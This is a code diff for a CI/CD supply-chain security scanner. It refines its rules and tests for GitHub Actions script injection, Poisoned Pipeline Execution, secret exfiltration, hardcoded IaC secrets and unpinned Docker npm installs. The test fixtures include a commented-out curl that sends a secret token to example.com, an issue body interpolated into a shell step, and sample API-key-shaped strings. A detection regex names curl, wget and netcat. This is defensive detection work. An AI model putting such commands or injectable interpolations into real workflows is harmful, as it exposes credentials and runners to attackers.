+      expect(findings.some((f) => f.rule === "GHA_SCRIPT_INJECTION")).toBe(false);
+    });
+
+    it("FALSE POSITIVE: untrusted context passed as a with: input", () => {
+      // with: inputs reach the action as INPUT_* environment variables, not as
+      // shell text (the github-script `script:` input is handled above).
+      writeWorkflow(tempDir, "with-input.yml", [
+        "on: issues",
+        "jobs:",
+        "  label:",
+        "    steps:",
+        "      - uses: some/labeler@v1",
+        "        with:",
+        "          title: ${{ github.event.issue.title }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SCRIPT_INJECTION")).toBe(false);
+    });
+
+    it("FALSE POSITIVE: a commented-out example inside a run: block", () => {
+      writeWorkflow(tempDir, "comment.yml", [
+        "on: issues",
+        "jobs:",
+        "  doc:",
+        "    steps:",
+        "      - run: |",
+        "          # never do: echo ${{ github.event.issue.body }}",
+        "          echo ok",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SCRIPT_INJECTION")).toBe(false);
+    });
+  });
+
+  // ── the line-region classifier the two rules above are built on ──────────
+
+  describe("classifyWorkflowLines", () => {
+    it("separates run:/script: bodies from env: mappings", () => {
+      const regions = classifyWorkflowLines(
+        [
+          "jobs:", // 0 other
+          "  a:", // 1 other
+          "    steps:", // 2 other
+          "      - env:", // 3 other (header)
+          "          X: 1", // 4 env
+          "        run: |", // 5 other (header)
+          "          env: not-yaml", // 6 exec (opaque shell text)
+          "        with:", // 7 other
+          "          script: |", // 8 other (header)
+          "            core.info('x')", // 9 exec
+        ].join("\n"),
+      );
+      expect(regions[4]).toBe("env");
+      expect(regions[6]).toBe("exec");
+      expect(regions[9]).toBe("exec");
+      expect(regions[7]).toBe("other");
+    });
+
+    it("treats an inline run: command as executed", () => {
+      const regions = classifyWorkflowLines(
+        ["steps:", "  - run: echo hi", "  - uses: actions/checkout@v4"].join("\n"),
+      );
+      expect(regions[1]).toBe("exec");
+      expect(regions[2]).toBe("other");
+    });
+  });
+
+  // ── IAC_HARDCODED_SECRET: inspect the value, not just the shape ──────────
+
+  describe("IAC_HARDCODED_SECRET", () => {
+    it("TRUE POSITIVE: an actual embedded credential", async () => {
+      fs.writeFileSync(
+        path.join(tempDir, "main.tf"),
+        'resource "aws_db_instance" "db" {\n  password = "Pr0dDbP4ss!7xQ"\n}\n',
+      );
+      const report = await scan({ target: tempDir, format: "text" });
+      const f = report.findings.find((f) => f.rule === "IAC_HARDCODED_SECRET");
+      expect(f).toBeDefined();
+      expect(f?.severity).toBe("critical");
+    });
+
+    it("TRUE POSITIVE: a committed API key literal", () => {
+      expect(isLikelyRealSecretValue("sk_live_51H8xY2eZvKYlo2CmT4x9")).toBe(true);
+      expect(isLikelyRealSecretValue("AKIAIOSFODNN7EXAMPLE")).toBe(true);
+      expect(isLikelyRealSecretValue("ghp_16C7e42F292c6912E7710c838347Ae178B4a")).toBe(true);
+    });
+
+    it("FALSE POSITIVE: a shell/terraform variable reference", async () => {
+      fs.writeFileSync(
+        path.join(tempDir, "deploy.tf"),
+        'provider "redis" {\n  password = "${REDIS_PASSWORD}"\n}\n',
+      );
+      const report = await scan({ target: tempDir, format: "text" });
+      expect(report.findings.find((f) => f.rule === "IAC_HARDCODED_SECRET")).toBeUndefined();
+    });
+
+    it("FALSE POSITIVE: a password that is GENERATED by command substitution", async () => {
+      fs.writeFileSync(
+        path.join(tempDir, "quickstart.hcl"),
+        'password="$(openssl rand -base64 32)"\n',
+      );
+      const report = await scan({ target: tempDir, format: "text" });
+      expect(report.findings.find((f) => f.rule === "IAC_HARDCODED_SECRET")).toBeUndefined();
+    });
+
+    it("FALSE POSITIVE: a namespace prefix constant", async () => {
+      fs.writeFileSync(
+        path.join(tempDir, "pat.ts"),
+        'const token = "trust_pat_"\nexport const full = token + randomBytes(24).toString("hex")\n',
+      );
+      const report = await scan({ target: tempDir, format: "text" });
+      expect(report.findings.find((f) => f.rule === "IAC_HARDCODED_SECRET")).toBeUndefined();
+    });
+
+    it("rejects references, prefixes, paths and placeholders at the value level", () => {
+      expect(isLikelyRealSecretValue("${REDIS_PASSWORD}")).toBe(false);
+      expect(isLikelyRealSecretValue("$REGISTRY_PASSWORD")).toBe(false);
+      expect(isLikelyRealSecretValue("$(openssl rand -base64 32)")).toBe(false);
+      expect(isLikelyRealSecretValue("${{ secrets.TOKEN }}")).toBe(false);
+      expect(isLikelyRealSecretValue("%DB_PASSWORD%")).toBe(false);
+      expect(isLikelyRealSecretValue("trust_pat_")).toBe(false);
+      expect(isLikelyRealSecretValue("/etc/ssl/private/server.key")).toBe(false);
+      expect(isLikelyRealSecretValue("your_secret_here")).toBe(false);
+      expect(isLikelyRealSecretValue("undefined")).toBe(false);
+    });
+  });
+
+  // ── DOCKER_NPM_GLOBAL: pinned installs are what the rule asks for ────────
+
+  describe("DOCKER_NPM_GLOBAL", () => {
+    it("TRUE POSITIVE: unpinned global install", () => {
+      const findings = scanDockerFile("RUN npm install -g some-package", "Dockerfile");
+      expect(findings.some((f) => f.rule === "DOCKER_NPM_GLOBAL")).toBe(true);
+    });
+
+    it("TRUE POSITIVE: dist-tag and range selectors are not pins", () => {
+      expect(isUnpinnedGlobalInstall("npm@latest")).toBe(true);
+      expect(isUnpinnedGlobalInstall("pnpm@next")).toBe(true);
+      expect(isUnpinnedGlobalInstall("pnpm@^9.1.0")).toBe(true);
+      expect(isUnpinnedGlobalInstall("pnpm@9.x")).toBe(true);
+      expect(isUnpinnedGlobalInstall("@scope/tool")).toBe(true);
+      // one pinned + one unpinned package still reports
+      expect(isUnpinnedGlobalInstall("pnpm@9.15.0 typescript")).toBe(true);
+    });
+
+    it("TRUE POSITIVE: the npm i / add aliases are covered too", () => {
+      expect(scanDockerFile("RUN npm i -g leftpad", "Dockerfile")
+        .some((f) => f.rule === "DOCKER_NPM_GLOBAL")).toBe(true);
+      expect(scanDockerFile("RUN npm add --global leftpad", "Dockerfile")
+        .some((f) => f.rule === "DOCKER_NPM_GLOBAL")).toBe(true);
+    });
+
+    it("FALSE POSITIVE: version-pinned global installs", () => {
+      const pinned = [
+        "RUN npm install -g pnpm@9",
+        "RUN npm install -g npm@11.18.0 && npm cache clean --force",
+        "RUN npm install -g @scope/tool@1.2.3",
+        "RUN npm install -g /tmp/supply-chain-guard-5.0.0.tgz",
+      ];
+      for (const line of pinned) {
+        expect(
+          scanDockerFile(line, "Dockerfile").some((f) => f.rule === "DOCKER_NPM_GLOBAL"),
+          line,
+        ).toBe(false);
+      }
+    });
+
+    it("keeps reporting when the spec cannot be read (fail closed)", () => {
+      expect(isUnpinnedGlobalInstall("$PACKAGES")).toBe(true);
+      expect(isUnpinnedGlobalInstall("--force")).toBe(true);
+    });
+  });
+
+  // ── allowlist.githubOrgs is enforced, not silently dropped ───────────────
+
+  describe("allowlist.githubOrgs", () => {
+    const actionFinding = (rule: string, ref: string): Finding => ({
+      rule,
+      description: `Action "${ref}" is from third-party owner "${ref.split("/")[0]}".`,
+      severity: "low",
+      file: ".github/workflows/ci.yml",
+      line: 7,
+      match: ref,
+    });
+
+    it("suppresses ownership-trust findings for an allowlisted org", () => {
+      const result = applyPolicy(
+        [
+          actionFinding("GHA_THIRD_PARTY_ACTION", "my-org/deploy-action@v1"),
+          actionFinding("GHA_TAG_NOT_SHA", "my-org/deploy-action@v1"),
+        ],
+        { allowlist: { githubOrgs: ["My-Org"] } },
+      );
+      expect(result.findings).toHaveLength(0);
+      expect(result.suppressedCount).toBe(2);
+    });
+
+    it("does NOT suppress findings for other owners", () => {
+      const result = applyPolicy(
+        [actionFinding("GHA_THIRD_PARTY_ACTION", "someone-else/action@v1")],
+        { allowlist: { githubOrgs: ["my-org"] } },
+      );
+      expect(result.findings).toHaveLength(1);
+    });
+
+    it("does NOT suppress a known-malicious SHA for an allowlisted org", () => {
+      // Trusting a publisher must never silence a confirmed-compromise finding.
+      const finding: Finding = {
+        rule: "GHA_KNOWN_MALICIOUS_SHA",
+        description: 'Action "my-org/action@d8462b4" references a KNOWN COMPROMISED commit SHA.',
+        severity: "critical",
+        match: "my-org/action@d8462b4",
+      };
+      const result = applyPolicy([finding], { allowlist: { githubOrgs: ["my-org"] } });
+      expect(result.findings).toHaveLength(1);
+      expect(result.findings[0].severity).toBe("critical");
+    });
+  });
+});

--- a/src/__tests__/rule-precision.test.ts
+++ b/src/__tests__/rule-precision.test.ts
@@ -101,6 +101,22 @@ describe("v5.18 rule precision", () => {
       expect(f?.line).toBe(11);
     });
 
+    it("FALSE POSITIVE: a commented-out curl in a step that holds a secret", () => {
+      writeWorkflow(tempDir, "commented.yml", [
+        "on: push",
+        "jobs:",
+        "  build:",
+        "    steps:",
+        "      - env:",
+        "          TOKEN: ${{ secrets.DEPLOY_TOKEN }}",
+        "        run: |",
+        "          # curl -d \"$TOKEN\" https://example.com  (disabled)",
+        '          echo "$TOKEN" > /dev/null',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE")).toBe(false);
+    });
+
     it("FALSE POSITIVE: a step that only runs `git fetch` with a secret in scope", () => {
       writeWorkflow(tempDir, "sync.yml", [
         "on: push",

--- a/src/config-scanner.ts
+++ b/src/config-scanner.ts
@@ -8,6 +8,7 @@
 import * as fs from "node:fs";
 import * as path from "node:path";
 import type { Finding, PatternEntry } from "./types.js";
+import { isPatternMatchAccepted } from "./patterns.js";
 
 // ---------------------------------------------------------------------------
 // Config patterns
@@ -111,6 +112,9 @@ export function scanConfigFile(
         continue; // skip comments
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,

--- a/src/dockerfile-scanner.ts
+++ b/src/dockerfile-scanner.ts
@@ -8,6 +8,66 @@
 import * as fs from "node:fs";
 import * as path from "node:path";
 import type { Finding, PatternEntry } from "./types.js";
+import { isPatternMatchAccepted } from "./patterns.js";
+
+// ---------------------------------------------------------------------------
+// Global npm install: pinned or not?
+// ---------------------------------------------------------------------------
+
+/** npm flags that carry no package name. */
+const NPM_FLAG_RE = /^-/;
+
+/** Shell operators that end the npm command (`&& npm cache clean --force`). */
+const SHELL_SEPARATOR_RE = /^(?:&&|\|\||;|\||&|\\)$/;
+
+/**
+ * A local artifact rather than a registry package: a path, a packed tarball, or
+ * an explicit `file:` specifier. Installing your own build output globally is
+ * not the mutable-registry-dependency this rule is about.
+ */
+const LOCAL_ARTIFACT_RE = /^(?:file:|\.{0,2}[\\/]|[A-Za-z]:[\\/])|\.(?:tgz|tar\.gz)$/;
+
+/**
+ * An EXACT version selector: `9`, `11.18.0`, `1.2.3-rc.1`, or a `@scope/name`
+ * spec ending in one. Range operators (`^`, `~`, `>`, `*`, `x`) and dist-tags
+ * (`latest`, `next`, `beta`) are NOT exact - both can resolve to a different
+ * package on the next build, which is exactly what this rule warns about.
+ */
+function isPinnedSpec(spec: string): boolean {
+  if (LOCAL_ARTIFACT_RE.test(spec)) return true;
+  // Ignore a leading scope "@" so @scope/name@1.2.3 splits on the right "@".
+  const at = spec.lastIndexOf("@");
+  if (at <= 0) return false; // no version at all: `npm i -g pnpm`
+  const version = spec.slice(at + 1);
+  return /^\d+(?:\.\d+)*(?:[-+][0-9A-Za-z.-]+)?$/.test(version);
+}
+
+/**
+ * True when a global npm install leaves at least one package UNPINNED.
+ *
+ * The rule's own recommendation has always been "pin the global package
+ * version", yet the pattern fired on `RUN npm install -g pnpm@9` and
+ * `RUN npm install -g npm@11.18.0` - installs that already do exactly what the
+ * recommendation asks (27 such findings in one Elvatis repo alone). Matching
+ * the command shape says nothing about the risk; the package SPECS do.
+ */
+export function isUnpinnedGlobalInstall(specs: string): boolean {
+  const tokens = specs
+    .trim()
+    .split(/\s+/)
+    .filter((t) => t !== "");
+
+  const packages: string[] = [];
+  for (const token of tokens) {
+    if (SHELL_SEPARATOR_RE.test(token)) break; // rest belongs to another command
+    if (NPM_FLAG_RE.test(token)) continue;
+    packages.push(token);
+  }
+
+  // No parseable package spec (e.g. a shell variable): keep reporting.
+  if (packages.length === 0) return true;
+  return packages.some((p) => !isPinnedSpec(p));
+}
 
 // ---------------------------------------------------------------------------
 // Dockerfile patterns
@@ -61,12 +121,17 @@ export const DOCKERFILE_PATTERNS: PatternEntry[] = [
   },
   {
     name: "docker-npm-global",
+    // Group 1 is everything after the global flag; isUnpinnedGlobalInstall()
+    // decides whether those package specs are actually unpinned (v5.18).
     pattern:
-      "RUN\\s+npm\\s+install\\s+(?:-g|--global)\\s+",
+      "RUN\\s+npm\\s+(?:install|i|add)\\s+(?:-g|--global|--location=global)\\s+(.+)$",
     description:
-      "Global npm install in Dockerfile. Packages installed globally may bypass lockfile integrity.",
+      "Unpinned global npm install in Dockerfile. Without a version the image installs " +
+      "whatever the registry serves at build time, so the same Dockerfile can produce a " +
+      "different (or compromised) package on the next build.",
     severity: "medium",
     rule: "DOCKER_NPM_GLOBAL",
+    valueFilter: isUnpinnedGlobalInstall,
   },
   {
     name: "docker-untrusted-registry",
@@ -130,6 +195,9 @@ export function scanDockerFile(
       const line = lines[i] ?? "";
       const match = regex.exec(line);
       if (match) {
+        regex.lastIndex = 0;
+        // v5.18: value-level guard (see PatternEntry.valueFilter)
+        if (!isPatternMatchAccepted(pattern, match)) continue;
         findings.push({
           rule: pattern.rule,
           description: pattern.description,
@@ -188,7 +256,9 @@ function getDockerRecommendation(rule: string): string {
     DOCKER_SECRETS_BUILD:
       "Use Docker BuildKit secrets (--mount=type=secret) or runtime environment variables instead of hardcoding secrets.",
     DOCKER_NPM_GLOBAL:
-      "Use local installs with npx, or pin the global package version and verify its integrity.",
+      "Pin every globally installed package to an exact version (npm install -g pnpm@9.15.0), " +
+      "or install locally with npx. A bare name, a dist-tag (@latest) and a range (@^9) all resolve " +
+      "at build time, so the image is not reproducible and a hijacked release lands silently.",
     DOCKER_UNTRUSTED_REGISTRY:
       "Use images from trusted registries (Docker Hub, GHCR, GCR, ECR) or verify the registry's authenticity.",
     DOCKER_SUID:

--- a/src/github-actions-scanner.ts
+++ b/src/github-actions-scanner.ts
@@ -970,7 +970,13 @@ function checkSecretsExfiltration(
 
   for (let s = 0; s < steps.length; s++) {
     const { step, job } = steps[s]!;
-    if (!step.run || !NETWORK_CMD_RE.test(step.run)) continue;
+    // Comment-stripped, so a commented-out example is not "runs a network
+    // command" (and matches the line search below).
+    const runCommands = (step.run ?? "")
+      .split("\n")
+      .map((l) => stripYamlComment(l))
+      .join("\n");
+    if (!step.run || !NETWORK_CMD_RE.test(runCommands)) continue;
 
     const secretInScope =
       SECRET_EXPR_RE.test(step.run) ||

--- a/src/github-actions-scanner.ts
+++ b/src/github-actions-scanner.ts
@@ -9,7 +9,12 @@
 import * as fs from "node:fs";
 import * as path from "node:path";
 import type { Finding, Severity } from "./types.js";
-import { parseWorkflow, type WfStep, type WfJob } from "./workflow-ast.js";
+import {
+  parseWorkflow,
+  classifyWorkflowLines,
+  type WfStep,
+  type WfJob,
+} from "./workflow-ast.js";
 
 /**
  * Patterns for detecting dangerous content in GitHub Actions workflow files.
@@ -116,28 +121,15 @@ const WORKFLOW_PATTERNS: Array<{
   },
 
   // ── 2025 attack patterns (PPE, OIDC theft, cache/artifact poisoning) ──
-
-  // Poisoned Pipeline Execution: pull_request_target + unsanitized PR context in run:
-  {
-    pattern: "\\$\\{\\{\\s*github\\.event\\.pull_request\\.",
-    description:
-      "Unsanitized pull_request event context used in workflow step — potential Poisoned Pipeline Execution (PPE). " +
-      "An attacker-controlled PR can inject arbitrary commands.",
-    severity: "critical",
-    rule: "GHA_PPE_PULL_TARGET",
-  },
-  // Script injection via user-controlled context (issue/PR body, PR/commit title,
-  // comment body, review body, discussion, PR head ref/label). v5.7 broadened the
-  // object list (added comment/review/discussion) and the field list (added
-  // label/ref/description) - the pre-v5.7 regex missed the issue_comment vector
-  // (github.event.comment.body) entirely.
-  {
-    pattern: "\\$\\{\\{\\s*github\\.event\\.(?:issue|pull_request|head_commit|commits?|comment|review|discussion)\\.[^}]*(?:body|title|message|name)\\s*\\}\\}",
-    description:
-      "User-controlled GitHub event data (issue/PR body, comment body, PR title, commit message) injected directly into a run: step — GitHub Actions Script Injection risk",
-    severity: "critical",
-    rule: "GHA_SCRIPT_INJECTION",
-  },
+  //
+  // GHA_PPE_PULL_TARGET and GHA_SCRIPT_INJECTION used to live here as bare
+  // line regexes. They are now context-aware rules in
+  // checkInterpolationSinkRules() below: a plain regex over the whole file
+  // cannot tell an interpolation that lands in a `run:` body (the attack) from
+  // one that lands in an `env:` value (GitHub's official mitigation for that
+  // very attack), and PPE additionally depends on which trigger fires the
+  // workflow.
+  //
   // OIDC token theft: id-token:write permission combined with outbound network call
   {
     pattern: "id-token:\\s*write",
@@ -267,8 +259,12 @@ function scanWorkflowContent(
   // Check action references (uses: directives)
   checkActionReferences(lines, relativePath, findings);
 
-  // Check for secrets sent to external URLs across multi-line run blocks
-  checkSecretsExfiltration(lines, relativePath, findings);
+  // Check for secrets sent to external URLs from within a single step
+  checkSecretsExfiltration(content, relativePath, findings);
+
+  // v5.18: PPE / script-injection, scoped to lines that are actually executed
+  // and (for PPE) to workflows whose trigger grants the elevated context.
+  checkInterpolationSinkRules(content, relativePath, findings);
 
   // v5.7: structural, trigger-aware rules (Cordyceps class) — these need to
   // know which event fires the workflow and what its token can do, which the
@@ -608,6 +604,154 @@ function checkWorkflowAstRules(
   }
 }
 
+// ── v5.18 context-aware interpolation-sink rules ────────────────────────────
+
+/** Any `github.event.pull_request.*` expression (the PPE source). */
+const PPE_CTX_RE = /\$\{\{\s*github\.event\.pull_request\./;
+
+/**
+ * User-controlled event text: issue/PR body or title, comment/review body,
+ * commit message, discussion title. This is the script-injection SOURCE - the
+ * value an attacker writes and GitHub pastes verbatim into the program text.
+ */
+const SCRIPT_INJECTION_CTX_RE =
+  /\$\{\{\s*github\.event\.(?:issue|pull_request|head_commit|commits?|comment|review|discussion)\.[^}]*(?:body|title|message|name)\s*\}\}/;
+
+/** `${{ env.NAME }}` - the env context is ALSO template-interpolated. */
+const ENV_CTX_RE = /\$\{\{\s*env\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}/g;
+
+/** `KEY: <value>` inside an `env:` mapping. */
+const ENV_ASSIGN_RE = /^\s*(?:-\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*:\s*(.+)$/;
+
+/**
+ * Triggers whose caller context is unknowable from this file alone. A reusable
+ * workflow is invoked BY another workflow, so its effective privilege is the
+ * caller's - possibly pull_request_target. Treated as privileged (fail closed).
+ */
+const CALLER_CONTEXT_TRIGGERS = ["workflow_call"];
+
+/**
+ * PPE (GHA_PPE_PULL_TARGET) and script injection (GHA_SCRIPT_INJECTION).
+ *
+ * Both rules ask the same question - "does attacker-controlled event data reach
+ * a place where it becomes code?" - and both were previously answered by a bare
+ * regex over the entire file. That over-matched in two independent ways:
+ *
+ *   1. It fired on `env: PR_TITLE: ${{ github.event.pull_request.title }}`,
+ *      which is the mitigation GitHub documents (and that this scanner's own
+ *      GHA_SCRIPT_INJECTION recommendation tells users to apply).
+ *   2. PPE fired regardless of trigger. Interpolating PR context in a plain
+ *      `pull_request` workflow runs in the FORK's context with a read-only
+ *      token and no secrets - the attacker gains nothing they did not already
+ *      have. PPE is about the ELEVATED context (pull_request_target /
+ *      workflow_run / issue_comment), where the same expression executes with
+ *      the base repository's secrets.
+ *
+ * Both rules now only consider `exec` lines (a `run:` shell body or a
+ * github-script `script:` body), and PPE additionally requires an elevated
+ * trigger. Indirection through `env:` is still caught: a value moved into an
+ * env var and then read back with `${{ env.NAME }}` (rather than the shell's
+ * `$NAME`) is interpolated into the program text just the same, and is
+ * reported at the line that reads it back.
+ */
+function checkInterpolationSinkRules(
+  content: string,
+  relativePath: string,
+  findings: Finding[],
+): void {
+  const lines = content.replace(/\r/g, "").split("\n");
+
+  let regions;
+  try {
+    regions = classifyWorkflowLines(content);
+  } catch {
+    return;
+  }
+
+  // Env vars whose value carries untrusted event data. Reading one back with
+  // ${{ env.X }} re-introduces the injection the env: hop was meant to stop.
+  const taintedEnv = { ppe: new Set<string>(), injection: new Set<string>() };
+  for (let i = 0; i < lines.length; i++) {
+    if (regions[i] !== "env") continue;
+    const m = ENV_ASSIGN_RE.exec(stripYamlComment(lines[i] ?? ""));
+    if (!m) continue;
+    if (PPE_CTX_RE.test(m[2]!)) taintedEnv.ppe.add(m[1]!);
+    if (SCRIPT_INJECTION_CTX_RE.test(m[2]!)) taintedEnv.injection.add(m[1]!);
+  }
+
+  const readsTaintedEnv = (line: string, tainted: Set<string>): boolean => {
+    if (tainted.size === 0) return false;
+    ENV_CTX_RE.lastIndex = 0;
+    let m: RegExpExecArray | null;
+    while ((m = ENV_CTX_RE.exec(line)) !== null) {
+      if (tainted.has(m[1]!)) return true;
+    }
+    return false;
+  };
+
+  // Trigger model: which context does this workflow's token run in?
+  let triggers: string[] = [];
+  let triggersKnown = false;
+  try {
+    triggers = parseWorkflow(content).triggers;
+    triggersKnown = triggers.length > 0;
+  } catch {
+    triggersKnown = false;
+  }
+  const triggerSet = new Set(triggers);
+  const privileged = PRIVILEGED_TRIGGERS.filter((t) => triggerSet.has(t));
+  const callerContext = CALLER_CONTEXT_TRIGGERS.filter((t) => triggerSet.has(t));
+  // Fail closed: if the triggers cannot be read at all, keep reporting.
+  const ppeApplies = privileged.length > 0 || callerContext.length > 0 || !triggersKnown;
+
+  for (let i = 0; i < lines.length; i++) {
+    if (regions[i] !== "exec") continue;
+    const line = stripYamlComment(lines[i] ?? "");
+    if (!line.trim()) continue;
+
+    if (ppeApplies && (PPE_CTX_RE.test(line) || readsTaintedEnv(line, taintedEnv.ppe))) {
+      const context =
+        privileged.length > 0
+          ? `a ${privileged.join("/")} trigger`
+          : callerContext.length > 0
+            ? `a reusable (${callerContext.join("/")}) workflow whose caller may be privileged`
+            : "a workflow whose triggers could not be determined";
+      findings.push({
+        rule: "GHA_PPE_PULL_TARGET",
+        description:
+          `Unsanitized pull_request event context is interpolated into an executed step of ` +
+          `${context}, which runs in the base repository context with access to secrets and a ` +
+          `read/write GITHUB_TOKEN. An attacker-controlled PR can inject arbitrary commands that ` +
+          `execute with those privileges (Poisoned Pipeline Execution).`,
+        severity: "critical",
+        file: relativePath,
+        line: i + 1,
+        match: truncateMatch(line.trim()),
+        recommendation: getWorkflowRecommendation("GHA_PPE_PULL_TARGET"),
+      });
+    }
+
+    if (
+      SCRIPT_INJECTION_CTX_RE.test(line) ||
+      readsTaintedEnv(line, taintedEnv.injection)
+    ) {
+      findings.push({
+        rule: "GHA_SCRIPT_INJECTION",
+        description:
+          "User-controlled GitHub event data (issue/PR body, comment body, PR title, commit message) " +
+          "is interpolated directly into an executed step (run: shell body or github-script script: body). " +
+          "GitHub substitutes the value into the program text before it runs, so an attacker who writes " +
+          "that text executes commands in your runner (GitHub Actions Script Injection).",
+        severity: "critical",
+        file: relativePath,
+        line: i + 1,
+        match: truncateMatch(line.trim()),
+        recommendation: getWorkflowRecommendation("GHA_SCRIPT_INJECTION"),
+      });
+    }
+  }
+}
+
 /**
  * Check workflow content against known dangerous patterns.
  */
@@ -763,119 +907,122 @@ function checkActionReferences(
   }
 }
 
+/** A secret expression: `${{ secrets.NAME }}`. */
+const SECRET_EXPR_RE = /\$\{\{\s*secrets\.\w+\s*\}\}/;
+
 /**
- * Check for secrets being sent to external URLs in run blocks.
- * Looks for multi-line run: blocks that contain both secret references
- * and outbound network calls.
+ * Commands that move data off the runner. `git fetch` is excluded: it pulls
+ * source INTO the runner and carries no secret out, and matching the bare word
+ * made the rule point at a repository sync instead of at the actual outbound
+ * call further down the same step.
+ */
+const NETWORK_CMD_RE = /\b(?:curl|wget|nc|ncat|netcat)\b|(?<!git\s)\bfetch\b/;
+
+/**
+ * Check for secrets reaching a network command inside ONE step (v5.18).
+ *
+ * The previous implementation walked the file line by line with a
+ * `envSecretsExported` flag that was file-level and STICKY: once any step
+ * anywhere in the file put a secret in its `env:`, every later run block that
+ * merely mentioned `curl` was treated as holding that secret. Worse, its
+ * run-block exit test (`lineIndent <= runBlockIndent && !/^\s+/`) could only be
+ * satisfied by a column-0 line, so blocks never ended: the whole file collapsed
+ * into one rolling "block" whose start pointer had moved on to the LAST `run:`
+ * seen. The finding therefore named a step that contained neither the secret
+ * nor, in general, the network call.
+ *
+ * The rule is now evaluated per step, using the workflow AST:
+ *   - a secret is in scope for a step if it is referenced in the step's own
+ *     `run`, in the step's `env:`, in the job's `env:`, or in the workflow-level
+ *     `env:` (all three really are in that step's environment), and
+ *   - the network command must appear in THAT step's `run:` body.
+ * The finding points at the line of the network command inside the step.
  */
 function checkSecretsExfiltration(
-  lines: string[],
+  content: string,
   relativePath: string,
   findings: Finding[],
 ): void {
-  const secretPattern = /\$\{\{\s*secrets\.\w+\s*\}\}/;
-  const networkPattern = /\b(?:curl|wget|fetch|nc|ncat|netcat)\b/;
-  const envExportPattern = /^\s*\w+:\s*\$\{\{\s*secrets\.\w+/;
+  const lines = content.replace(/\r/g, "").split("\n");
 
-  // Track env: blocks that export secrets and subsequent run: blocks
-  let inRunBlock = false;
-  let runBlockStart = -1;
-  let runBlockHasSecrets = false;
-  let runBlockHasNetwork = false;
-  let runBlockIndent = 0;
-
-  // Also track env-exported secrets at step/job level
-  let envSecretsExported = false;
-
-  for (let i = 0; i < lines.length; i++) {
-    const line = lines[i] ?? "";
-
-    // Check env: blocks for secret exports
-    if (envExportPattern.test(line)) {
-      envSecretsExported = true;
-    }
-
-    // Detect start of run: block
-    const runMatch = /^(\s*)(?:-\s+)?run:\s*[|>]?\s*$/.exec(line);
-    const inlineRunMatch = /^(\s*)(?:-\s+)?run:\s+(.+)$/.exec(line);
-
-    if (runMatch) {
-      inRunBlock = true;
-      runBlockStart = i;
-      runBlockIndent = (runMatch[1] ?? "").length;
-      runBlockHasSecrets = false;
-      runBlockHasNetwork = false;
-      continue;
-    }
-
-    if (inlineRunMatch) {
-      // Single-line run: - already caught by WORKFLOW_PATTERNS
-      inRunBlock = false;
-      continue;
-    }
-
-    if (inRunBlock) {
-      // Check if we've left the block (dedented or empty non-continuation)
-      const lineIndent = line.length - line.trimStart().length;
-      if (line.trim().length > 0 && lineIndent <= runBlockIndent && !/^\s+/.test(line)) {
-        // Exited run block
-        if (runBlockHasSecrets && runBlockHasNetwork) {
-          // Already caught by line-level patterns if on same line;
-          // this catches split across lines
-          const alreadyFound = findings.some(
-            (f) =>
-              (f.rule === "GHA_SECRET_CURL" || f.rule === "GHA_SECRET_WGET") &&
-              f.file === relativePath &&
-              f.line !== undefined &&
-              f.line >= runBlockStart + 1 &&
-              f.line <= i,
-          );
-          if (!alreadyFound) {
-            findings.push({
-              rule: "GHA_SECRET_EXFIL_MULTILINE",
-              description: "Secrets and network commands found in the same run block (potential exfiltration across multiple lines)",
-              severity: "high",
-              file: relativePath,
-              line: runBlockStart + 1,
-              recommendation:
-                "Review this run block. Secrets combined with network commands in the same step can indicate credential exfiltration.",
-            });
-          }
-        }
-        inRunBlock = false;
-      }
-
-      if (inRunBlock) {
-        if (secretPattern.test(line)) runBlockHasSecrets = true;
-        if (networkPattern.test(line)) runBlockHasNetwork = true;
-
-        // Also check if env-exported secrets are used with network
-        if (envSecretsExported && networkPattern.test(line)) {
-          runBlockHasSecrets = true;
-        }
-      }
-    }
+  let ast;
+  try {
+    ast = parseWorkflow(content);
+  } catch {
+    ast = undefined;
   }
 
-  // Handle case where run block extends to end of file
-  if (inRunBlock && runBlockHasSecrets && runBlockHasNetwork) {
+  const envHasSecret = (env?: Record<string, string>): boolean =>
+    env !== undefined && Object.values(env).some((v) => SECRET_EXPR_RE.test(v));
+
+  // Fail closed: a file this parser cannot break into steps still gets the old
+  // coarse file-level check (reported at line 1), so nothing goes undetected.
+  const steps = ast?.jobs.flatMap((job) => job.steps.map((step) => ({ step, job })));
+  if (!steps || steps.length === 0) {
+    if (SECRET_EXPR_RE.test(content) && NETWORK_CMD_RE.test(content)) {
+      pushExfilFinding(findings, relativePath, 1, true);
+    }
+    return;
+  }
+
+  const workflowEnvSecret = envHasSecret(ast?.env);
+  const stepStartLines = steps.map(({ step }) => step.line);
+
+  for (let s = 0; s < steps.length; s++) {
+    const { step, job } = steps[s]!;
+    if (!step.run || !NETWORK_CMD_RE.test(step.run)) continue;
+
+    const secretInScope =
+      SECRET_EXPR_RE.test(step.run) ||
+      envHasSecret(step.env) ||
+      envHasSecret(job.env) ||
+      workflowEnvSecret;
+    if (!secretInScope) continue;
+
+    // Point at the network command inside this step, not at the step header.
+    const stepEnd = stepStartLines[s + 1] ?? lines.length + 1;
+    let line = step.line;
+    for (let i = step.line - 1; i < stepEnd - 1 && i < lines.length; i++) {
+      if (NETWORK_CMD_RE.test(stripYamlComment(lines[i] ?? ""))) {
+        line = i + 1;
+        break;
+      }
+    }
+
+    // Skip when a line-level rule already reported this exact step.
     const alreadyFound = findings.some(
       (f) =>
         (f.rule === "GHA_SECRET_CURL" || f.rule === "GHA_SECRET_WGET") &&
-        f.file === relativePath,
+        f.file === relativePath &&
+        f.line !== undefined &&
+        f.line >= step.line &&
+        f.line < stepEnd,
     );
-    if (!alreadyFound) {
-      findings.push({
-        rule: "GHA_SECRET_EXFIL_MULTILINE",
-        description: "Secrets and network commands found in the same run block (potential exfiltration across multiple lines)",
-        severity: "high",
-        file: relativePath,
-        line: runBlockStart + 1,
-        recommendation:
-          "Review this run block. Secrets combined with network commands in the same step can indicate credential exfiltration.",
-      });
-    }
